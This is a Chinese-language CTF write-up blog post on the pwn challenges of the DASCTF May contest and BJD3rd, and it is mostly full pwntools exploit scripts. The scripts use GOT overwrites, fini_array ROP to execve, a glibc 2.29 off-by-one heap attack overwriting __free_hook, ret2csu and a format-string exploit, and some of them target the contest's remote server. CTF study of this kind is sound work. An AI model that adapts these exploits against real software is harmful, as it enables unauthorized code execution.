1p0ch
0%

安恒/DASCTF五月月赛&BJD3rd的wp及赛后复现(pwn部分)

发表于 更新于 分类于
本文字数: 16k 阅读时长 ≈ 15 分钟

今天👴又打了DASCTF五月月赛,👴还是从前那个five。可惜最近事情略多,没有打完整场比赛,打了一天就咕咕咕了。菜鸡如我只能靠赛后复现学习一下,taqini,永远滴神。

pwn1 taqinioj0

这题,按照提示输出后会给出flag的位置,似乎没法getshell?反正直接orw就行了。但是程序限制了编码时候的flag字符串,所以这里我们选择写一个read读入flag然后进行orw的攻击。这里就写个code完事。
exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <stdio.h>
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
int main()
{
char a[32]={0};
char b[60]={0};
printf("step 1\n");
gets(a);
int fd=open(a,O_RDONLY);
printf("step 2\n");
read(fd,b,0x30);
write(1,b,0x30);
printf("step 4\n");
return 0;
}@

pwn2 Memory Monster I

一个栈题目,开了canary,基本思路就是把canary的chk_fail的got表改成后门函数就行。
exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *
context.log_level='debug'
#p=process('./Memory_Monster_I')
elf=ELF('./Memory_Monster_I')
p=remote('183.129.189.60',10082)
__stack_chk_fail_got=elf.got['__stack_chk_fail']

backdoor=0x40124a

p.recvuntil('addr')
##gdb.attach(p)
#pause()
payload=p64(__stack_chk_fail_got).ljust(0x30,'\x00')
p.send(payload)
p.recvuntil('data:')
payload=p64(backdoor)
#pause()
p.send(payload)
p.interactive()

pwn3 Memory Monster II

算是上一题的进阶把,是一道静态链接题目,还删了符号表,只能自己大概逆一下,找出主要函数。这里也是有后门,但是我没找到,就直接用了system函数自己写/bin/sh打。这里我改chk_fail为main函数构造循环然后修改puts为system。由于puts内容的地址是可写的,所以写个/bin/sh进去就行。
exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.arch = 'amd64'
context.log_level='debug'
#p=process('./Memory_Monster_II')
elf=ELF('./Memory_Monster_II')

p=remote('183.129.189.60',10100)
__stack_chk_fail_got=0x4BB058
puts_got=0x4bb0c0
bss=0x4befa0
data=0x4BB100
tls=0x4C07C0
#0x4C07C0
heap=0x1baa8a8
pop_rdi=0x401746
system=0x401D00
bin_sh=0x492895
'''
0x4BB058       ********
'''
#backdoor=0x46F3DF
main=0x401C59

#0x4C07C0
p.recvuntil('addr')
#gdb.attach(p)
#pause()
payload=p64(__stack_chk_fail_got).ljust(0x29,'\xaa')#+p64(pop_rdi)+p64(bin_sh)+p64(system)
p.send(payload)
p.recvuntil('data:')
payload=p64(main)
p.send(payload)

p.recvuntil('addr')
payload=p64(data).ljust(0x29,'\xaa')
p.send(payload)
p.recvuntil('data:')
payload='/bin/sh\x00'
p.send(payload)

p.recvuntil('addr')
payload=p64(puts_got).ljust(0x29,'\xaa')
p.send(payload)
p.recvuntil('data:')
payload=p64(0x401D00)
p.send(payload)
p.interactive()

以上就是👴做的题了,剩下全是赛后复现辣。

pwn4 Memory Monster III

这里呢又是再一次进阶,但是由于开始第二步的方向有点偏,导致我没搞出来,正常来说上一步打.finiarray然后这一步继续用rop+execve,思路就很流畅。

这里学习了一下finiarray上构造rop的方法,然后用这个方法打就完事

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
from pwn import *
context.arch = 'amd64'
context.log_level='debug'
p=process('./Memory_Monster_III')
elf=ELF('./Memory_Monster_III')

#p=remote('183.129.189.60',10100)
mprotect=0x448420
__stack_chk_fail_got=0x4B8058
__stack_chk_fail_plt=0x43ddd0
puts_got=0x4B80C0
libc_csu_fini=0x402CA0
finiarray=0x4b50b0
main=0x401C1d
pop_rax=0x44806c
pop_rdi=0x401746
pop_rdx_rsi=0x44ab09 
syscall=0x402504
bin_sh=0x4b5100
ret=0x401016
leave_ret=0x401cf3
pop_rsi=0x406f80
#0x4C07C0
#execve 59 0x3b


p.recvuntil('addr')
payload=p64(finiarray)
p.send(payload)
p.recvuntil('data:')
payload=p64(libc_csu_fini)+p64(main)
p.send(payload)
#p.interactive()
#gdb.attach(p)
#pause()
#mprotect 10

p.recvuntil('addr')
payload=p64(finiarray+0x10)
p.send(payload)
p.recvuntil('data:')
payload=p64(pop_rax)+p64(0x3b)+p64(pop_rdi)
p.send(payload)

p.recvuntil('addr')
payload=p64(finiarray+0x28)
p.send(payload)
p.recvuntil('data:')
payload=p64(bin_sh)+p64(pop_rdx_rsi)+p64(0)
p.send(payload)
#gdb.attach(p)
#pause()

p.recvuntil('addr')
payload=p64(finiarray+0x40)
p.send(payload)
p.recvuntil('data:')
payload=p64(0)+p64(syscall)+'/bin/sh\x00'
p.send(payload)

p.recvuntil('addr')
payload=p64(finiarray)
p.send(payload)
p.recvuntil('data:')
#gdb.attach(p)
#pause()
payload=p64(leave_ret)+p64(ret)
p.send(payload)
p.interactive()

pwn5 happyending

2.29的offbyone的经典题目了,趁机复现一下写个模板出来。

参考链接

这道题目就主要利用largebins的fdnextsize、bknextsize及smallbins/fastbins的残留指针加以利用,进而绕过2.29对于unlink的检测。

1
2
3
4
if (__glibc_unlikely (chunksize(p) != prevsize))
    malloc_printerr ("corrupted size vs. prev_size while consolidating");
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
    malloc_printerr (check_action, "corrupted double-linked list", P, AV);

exp:

(我觉得在exp里写的很清楚了,就不做过多讲解了,不清楚的部分可以参考上面的链接,另外这里我本地环境是2.30,关闭了aslr方便调试)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context(log_level="debug", arch="amd64", os="linux")
p=process('./pwn')
#p=remote('183.129.189.60',10024)
elf=ELF('./pwn')
puts_got=elf.got['puts']
free_got=elf.got['free']

#libc2.29

#addr=0x6020A0
def add(size,content):
	p.recvuntil('>')
	p.sendline('1')
	p.recvuntil('length :')
	p.sendline(str(size))
	p.recvuntil('Best wishes to them!')
	p.send(content)

def free(idx):
	p.recvuntil('>')
	p.sendline('2')
	p.recvuntil('debuff :')
	p.sendline(str(idx))

def show(idx):
	p.recvuntil('>')
	p.sendline('3')
	p.recvuntil('blessing :\n')
	p.sendline(str(idx))
#0x555555559000
for i in range(6):#0-5
	add(0x1000,'a')
add(0x1000-0x440,'a')#6
for i in range(7):#7-13
	add(0x28,'b')
add(0xa20,'use')#14
add(0x10,'avoid')#15

free(14)
add(0x1000,'arrange')#14  into largebins
add(0x28,p64(0)+p64(0X521)+p8(0x40))#fake chunk 16----->use
'''
0x555555560010:	0x0000000000000000	0x0000000000000031
0x555555560020:	0x0000000000000000	0x0000000000000521
0x555555560030:	0x0000555555560040	0x0000555555560010
0x555555560040:	0x0000000000000000	0x0000000000000a01
0x555555560050:	0x00007ffff7fb0be0	0x00007ffff7fb0be0
'''
add(0x28,'victim1')#17
add(0x28,'a')#18
add(0x28,'victim2')#19
add(0x28,'a')#20
for i in range(7):#7-13
	free(7+i)

#into fastbin
free(19)
free(17)#--->use
'''
gdb-peda$ bins
tcachebins
0x30 [  7]: 0x55555555fff0 —▸ 0x55555555ffc0 —▸ 0x55555555ff90 —▸ 0x55555555ff60 —▸ 0x55555555ff30 —▸ 0x55555555ff00 —▸ 0x55555555fed0 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x555555560040 —▸ 0x5555555600a0 ◂— 0x0
'''

for i in range(7):#7-13
	add(0x28,'c')
#fastbin into smallbin
add(0x400, '\n') #17
'''
unsortedbin
all: 0x555555560540 —▸ 0x7ffff7fb0be0 (main_arena+96) ◂— 0x555555560540
smallbins
0x30: 0x5555555600a0 —▸ 0x555555560040 —▸ 0x7ffff7fb0c00 (main_arena+128) ◂— 0x5555555600a0
'''
#fakechunk->fd->bk=fakechunk
#fakechunk->bk->fd=fakechunk
'''
gdb-peda$ x/30gx 0x555555560010
0x555555560010:	0x0000000000000000	0x0000000000000031 ------->chunk1
0x555555560020:	0x0000000000000000	0x0000000000000521 ------->fake_chunk(chunk1->fd to fake_chunk)
0x555555560030:	0x0000555555560040	0x0000555555560010 ------->fd=victim1,victim1->bk=fake_chunk,bk=chunk1,chunk1->fd=fake_chunk
0x555555560040:	0x0000000000000000	0x0000000000000031 ------->victim1
0x555555560050:	0x00007ffff7fb0c00	0x00005555555600a0 ------->bk to fake_chunk
0x555555560060:	0x0000000000000000	0x0000000000000000
0x555555560070:	0x0000000000000030	0x0000000000000030
0x555555560080:	0x00007ffff7fb0061	0x00007ffff7fb0be0
0x555555560090:	0x0000000000000000	0x0000000000000000
0x5555555600a0:	0x0000000000000000	0x0000000000000031 ------->victim2(in order to make 0x55......)
0x5555555600b0:	0x0000555555560040	0x00007ffff7fb0c00
0x5555555600c0:	0x0000000000000000	0x0000000000000000
'''
add(0x28,p64(0)+p8(0x20))#19  victim1
add(0x28,'clear tcache')#21
for i in range(7):#7-13
	free(7+i)
free(18)
free(16)#use chunk1  
for i in range(7):#7-13
	add(0x28,'c')
'''
gdb-peda$ x/20gx 0x555555560010
0x555555560010:	0x0000000000000000	0x0000000000000031 ------->chunk1
0x555555560020:	0x0000555555560070	0x0000000000000521 ------->fake_chunk(chunk1->fd to fake_chunk)
0x555555560030:	0x0000555555560040	0x0000555555560010 ------->fd=victim1,victim1->bk=fake_chunk,bk=chunk1,chunk1->fd=fake_chunk
0x555555560040:	0x0000000000000000	0x0000000000000031 ------->victim1
0x555555560050:	0x0000000000000000	0x0000555555560020 ------->bk to fake_chunk
0x555555560060:	0x0000000000000000	0x0000000000000000
gdb-peda$ bins
tcachebins
empty
fastbins
0x20: 0x0
0x30: 0x555555560010 —▸ 0x555555560070 ◂— 0x0# 010 is last in, so first out
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x555555560510 —▸ 0x7ffff7fb0be0 (main_arena+96) ◂— 0x555555560510
'''
#gdb.attach(p)
#pause()

add(0x28,p8(0x20))#16 the chunk1,to fake the fd   
'''
arrange into tcache
gdb-peda$ bins
tcachebins
0x30 [  1]: 0x555555560080 ◂— 0x0
gdb-peda$ x/20gx 0x555555560010
0x555555560010:	0x0000000000000000	0x0000000000000031 ------->chunk1
0x555555560020:	0x0000555555560020	0x0000000000000521 ------->fake_chunk(chunk1->fd to fake_chunk)
0x555555560030:	0x0000555555560040	0x0000555555560010 ------->fd=victim1,victim1->bk=fake_chunk,bk=chunk1,chunk1->fd=fake_chunk
0x555555560040:	0x0000000000000000	0x0000000000000031 ------->victim1
0x555555560050:	0x0000000000000000	0x0000555555560020 ------->bk to fake_chunk
now we fake successful, satisfy
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
    malloc_printerr (check_action, "corrupted double-linked list", P, AV);
'''
add(0x28,'clear tcache')#18
'''
gdb-peda$ x/20gx 0x555555560510
0x555555560510:	0x0000000000000000	0x0000000000000531
0x555555560520:	0x00007ffff7fb0be0	0x00007ffff7fb0be0
0x555555560530:	0x0000000000000000	0x0000000000000000
0x555555560540:	0x0000000000000000	0x0000000000000000
'''
add(0x28,'to off by one')#22
add(0x4f8,'obo')#23 chunk size=0x501
free(22)
add(0x28,p64(0)*4+p64(0x520))#22
'''
gdb-peda$ x/20gx 0x555555560540-0x520
0x555555560020:	0x0000555555560020	0x0000000000000521
0x555555560030:	0x0000555555560040	0x0000555555560010
0x555555560040:	0x0000000000000000	0x0000000000000031
0x555555560050:	0x0000000000000000	0x0000555555560020
gdb-peda$ x/20gx 0x555555560540
0x555555560540:	0x0000000000000520	0x0000000000000500
0x555555560550:	0x00007fff006f626f	0x00007ffff7fb0be0
here we satisfy
if (__glibc_unlikely (chunksize(p) != prevsize))
    malloc_printerr ("corrupted size vs. prev_size while consolidating");
'''
free(23)
'''
unsortedbin
all: 0x555555560020 —▸ 0x7ffff7fb0be0 (main_arena+96) ◂— 0x555555560020 /* ' ' */
gdb-peda$ x/20gx 0x555555560010
0x555555560010:	0x0000000000000000	0x0000000000000031
0x555555560020:	0x0000555555560040	0x0000000000000a21
0x555555560030:	0x00007ffff7fb0be0	0x00007ffff7fb0be0
0x555555560040:	0x0000000000000000	0x0000000000000000 ------->victim1 chunk19
0x555555560050:	0x0000000000000000	0x0000555555560010
0x555555560060:	0x0000000000000000	0x0000000000000000
0x555555560070:	0x0000000000000030	0x0000000000000031 ------->chunk18
0x555555560080:	0x6374207261656c63	0x0000000065686361
0x555555560090:	0x0000000000000000	0x0000000000000000
0x5555555600a0:	0x0000000000000000	0x0000000000000031
'''
add(0x18,'a')#23
'''
gdb-peda$ x/20gx 0x555555560010
0x555555560010:	0x0000000000000000	0x0000000000000031
0x555555560020:	0x0000555555560040	0x0000000000000021
0x555555560030:	0x00007ffff7fb0061	0x00007ffff7fb1150
0x555555560040:	0x0000555555560020	0x0000000000000a01 ------->victim1 chunk19
0x555555560050:	0x00007ffff7fb0be0	0x00007ffff7fb0be0
0x555555560060:	0x0000000000000000	0x0000000000000000
0x555555560070:	0x0000000000000030	0x0000000000000031 ------->chunk18
0x555555560080:	0x6374207261656c63	0x0000000065686361
0x555555560090:	0x0000000000000000	0x0000000000000000
0x5555555600a0:	0x0000000000000000	0x0000000000000031
gdb-peda$ x/40gx 0x5555555580e0-0x80   chunklist
0x555555558060:	0x00005555555592a0	0x000055555555a2b0
0x555555558070:	0x000055555555b2c0	0x000055555555c2d0
0x555555558080:	0x000055555555d2e0	0x000055555555e2f0
0x555555558090:	0x000055555555f300	0x000055555555fed0
0x5555555580a0:	0x000055555555ff00	0x000055555555ff30
0x5555555580b0:	0x000055555555ff60	0x000055555555ff90
0x5555555580c0:	0x000055555555ffc0	0x000055555555fff0
0x5555555580d0:	0x0000555555560a70	0x0000555555560a50
0x5555555580e0:	0x0000555555560020	0x0000555555560110
0x5555555580f0:	0x0000555555560080	0x0000555555560050 ---------->18,19
0x555555558100:	0x00005555555600e0	0x00005555555600b0
0x555555558110:	0x0000555555560520	0x0000555555560030
'''

#gdb.attach(p)
#pause()

show(19)
libc=u64(p.recvuntil('\x7f').ljust(8,'\x00'))-0x70-0x01eab70
free_hook=libc+0x1edb20
system=libc+0x554e0
print(hex(libc))
payload=p64(0)*5+p64(0x31)
add(0x38,payload)#24
free(7)
free(18)
'''
gdb-peda$ bins
tcachebins
0x30 [  2]: 0x555555560080 —▸ 0x55555555fed0 ◂— 0x0
'''
free(24)
'''
gdb-peda$ bins
tcachebins
0x30 [  2]: 0x555555560080 —▸ 0x55555555fed0 ◂— 0x0
0x40 [  1]: 0x555555560050 ◂— 0x0
'''
payload='/bin/sh\x00'+p64(0)*4+p64(0x31)+p64(free_hook)
add(0x38,payload)#7
'''
tcachebins
0x30 [  2]: 0x555555560080 —▸ 0x7ffff7fb3b20 (__free_hook) ◂— 0x0
'''
add(0x28,'/bin/sh\x00')#18
add(0x28,p64(system))#24
'''
gdb-peda$ p __free_hook
$1 = (void (*)(void *, const void *)) 0x7ffff7e1b4e0 <__libc_system>
'''
free(18)
p.interactive()

pwn6 secret2

回答正确233次后有栈迁移,这题不能getshell,就用orw+ret2csu了。

“/dev/random”每次open都没有close,默认情况下,一个进程最大文件描述符是1023(一共1024个),所以只要后面文件描述符用尽,读出来的就是”\x00”了——–来自nopnop师傅的博客

这题的漏洞就在于打开文件后没有关闭,使得一定次数后读不出来就是’\x00’

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#!/usr/bin/env python
# -*- coding: utf-8 -*-from pwn import *
from pwn import *
p=process('./secret2')
context.log_level='debug'
context.arch = 'amd64'
elf=ELF('./secret2')
open_plt=elf.plt['open']
read_plt=elf.plt['read']
puts_plt=elf.plt['puts']
pop_rdi=0x40161b
pop_rsi_r15=0x401619
flag=0x4021DF
gadget_1=0x4015F8
gadget_2=0x40160E
payload='a'*9+flat([pop_rdi,flag])
payload+=flat([pop_rsi_r15,0,0])
payload+=flat([open_plt])
payload+=flat([gadget_2,0,1,read_plt,0,elf.bss(0x500),30])
payload+=flat([gadget_1,0,0,0,0,0,0,0])
payload+=flat([pop_rdi,elf.bss(0x500)])
payload+=p64(puts_plt)

'''
.text:00000000004015F8 loc_4015F8:                             ; CODE XREF: init+4C↓j
.text:00000000004015F8                 mov     rdx, r15
.text:00000000004015FB                 mov     rsi, r14
.text:00000000004015FE                 mov     edi, r13d
.text:0000000000401601                 call    qword ptr [r12+rbx*8]
.text:0000000000401605                 add     rbx, 1
.text:0000000000401609                 cmp     rbp, rbx
.text:000000000040160C                 jnz     short loc_4015F8
.text:000000000040160E
.text:000000000040160E loc_40160E:                             ; CODE XREF: init+31↑j
.text:000000000040160E                 add     rsp, 8
.text:0000000000401612                 pop     rbx
.text:0000000000401613                 pop     rbp
.text:0000000000401614                 pop     r12
.text:0000000000401616                 pop     r13
.text:0000000000401618                 pop     r14
.text:000000000040161A                 pop     r15
.text:000000000040161C                 retn
'''

p.recvuntil(' your name? ')
p.send(payload)

for i in range(1022+233):
	p.recvuntil('Secret: ')
	p.send('\x00')
p.interactive()

pwn7 easybabystack

据说是在midnight ctf 2020 pwn4基础上改的

主要就是利用格式化字符串中的’*’,但是这个直接getshell远程成功率可能比较低(本地还是可以的),所以这里给个nopnop师傅的mprotect+orw的方法的链接(nopnop,永远滴神!)

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#!/usr/bin/env python
# -*- coding: utf-8 -*-from pwn import *
from pwn import *
p=process('./easybabystack')
context.log_level='debug'
context.arch = 'amd64'
elf=ELF('./easybabystack')
pop_rdi=0x401733
pop_rsi_r15=0x401731
mprotect_got = 0x404050
read_got = 0x404038
system=0x401110
read_plt=0x401140
gadget1=0x401726
gadget2=0x401710

bss=0x4040a0

pop_rsp = 0x000000000040172d # pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret

'''
.text:0000000000401710 loc_401710:                             ; CODE XREF: init+54↓j
.text:0000000000401710                 mov     rdx, r14
.text:0000000000401713                 mov     rsi, r13
.text:0000000000401716                 mov     edi, r12d
.text:0000000000401719                 call    qword ptr [r15+rbx*8]
.text:000000000040171D                 add     rbx, 1
.text:0000000000401721                 cmp     rbp, rbx
.text:0000000000401724                 jnz     short loc_401710
.text:0000000000401726
.text:0000000000401726 loc_401726:                             ; CODE XREF: init+35↑j
.text:0000000000401726                 add     rsp, 8
.text:000000000040172A                 pop     rbx
.text:000000000040172B                 pop     rbp
.text:000000000040172C                 pop     r12
.text:000000000040172E                 pop     r13
.text:0000000000401730                 pop     r14
.text:0000000000401732                 pop     r15
.text:0000000000401734                 retn
'''

#gdb.attach(p)
#pause()
p.recv()
p.sendline('%*18$d%5$n')
p.recv()
p.sendline('1')
payload='a'*0x118
payload+=flat([gadget1,0,0,1,0,elf.bss(0x800),8,read_got,gadget2])
payload+=p64(0)*7
payload+=flat([pop_rdi,elf.bss(0x800),system])
p.recvuntil('message: ')
p.sendline(payload)
p.send('/bin/sh\x00')
p.interactive()

#0x401548
'''
.text:0000000000401541                 mov     rax, [rbp-70h]
.text:0000000000401545                 mov     rax, [rax]
.text:0000000000401548                 cmp     [rbp-8], rax
.text:000000000040154C                 jz      short loc_401578
'''

'''
.text:00000000004016A6                 lea     rax, [rbp-110h]
.text:00000000004016AD                 mov     rsi, rax
.text:00000000004016B0                 lea     rdi, aS         ; "%s"
.text:00000000004016B7                 mov     eax, 0
.text:00000000004016BC                 call    scanf
'''

pwn8 taqinioj1

关于如何c不写括号输出helloword,大概就是定义shellcode?,然后按照顺序写main函数,注意存放的地址就行。这题目赛后没有环境,没法复现。

最后总结一下,👴还是太菜了,接下来要多刷点题目提高一下,然后关于底层也要好好理解一下,多打打国外的比赛开阔一下思路,不然👴实在是跟不上咯。

好饿啊,早知道不学安全了